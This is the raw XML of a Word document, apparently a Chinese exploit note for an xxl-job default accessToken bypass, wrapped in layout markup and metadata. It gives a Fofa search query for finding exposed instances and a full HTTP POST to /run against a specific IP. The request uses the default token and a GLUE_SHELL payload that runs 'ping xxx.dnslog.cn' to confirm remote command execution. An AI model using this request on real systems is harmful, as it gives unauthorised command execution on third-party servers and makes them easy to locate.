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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxl-job-默认accessToken权限绕过漏洞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Fofa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body=" {\"code\":500,\"msg\":\"invalid request, HttpMethod not support.\"}"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94960" cy="1928495"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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1928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部分界面如下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1981835"/>
            <wp:effectExtent l="0" t="0" r="14605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98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Poc  存在的回显200，不存在回显500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 /run HTTP/1.1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0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Accept-Encoding: gzip, deflate, br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Accept: */*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Connection: close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Host: 47.243.169.31:18059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Content-Type: application/json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XXL-JOB-ACCESS-TOKEN: default token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Upgrade-Insecure-Requests: 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Content-Length: 348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"jobId": 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"executorHandler": "demoJobHandler",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"executorParams": "demoJobHandler",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"executorBlockStrategy": "SERIAL_EXECUTION",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"executorTimeout": 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"logId": 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"logDateTime": 1586373637819,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"glueType": "GLUE_SHELL",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"glueSource": "ping xxx.dnslog.cn",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"glueUpdatetime": 1586693836766,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"broadcastIndex": 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"broadcastTotal": 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2583180"/>
            <wp:effectExtent l="0" t="0" r="635" b="762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4、GUI工具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7960" cy="2137410"/>
            <wp:effectExtent l="0" t="0" r="5080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13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4CCA944"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B4CCA94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VlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="00CB3C62"/>
    <w:rsid w:val="06607A90"/>
    <w:rsid w:val="0E841E6D"/>
    <w:rsid w:val="0F735BF1"/>
    <w:rsid w:val="1F336F64"/>
    <w:rsid w:val="29046020"/>
    <w:rsid w:val="2F4D5ED7"/>
    <w:rsid w:val="3A847321"/>
    <w:rsid w:val="490F2020"/>
    <w:rsid w:val="4B671D01"/>
    <w:rsid w:val="5563538C"/>
    <w:rsid w:val="58024463"/>
    <w:rsid w:val="5DC40F95"/>
    <w:rsid w:val="688F4C8C"/>
    <w:rsid w:val="6CD44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2023-11-05T04:41:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-05T14:31:26Z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5C87E30ED3A943CC86D1F12539FB21D5_12</vt:lpwstr>
  </property>
</Properties>
</file>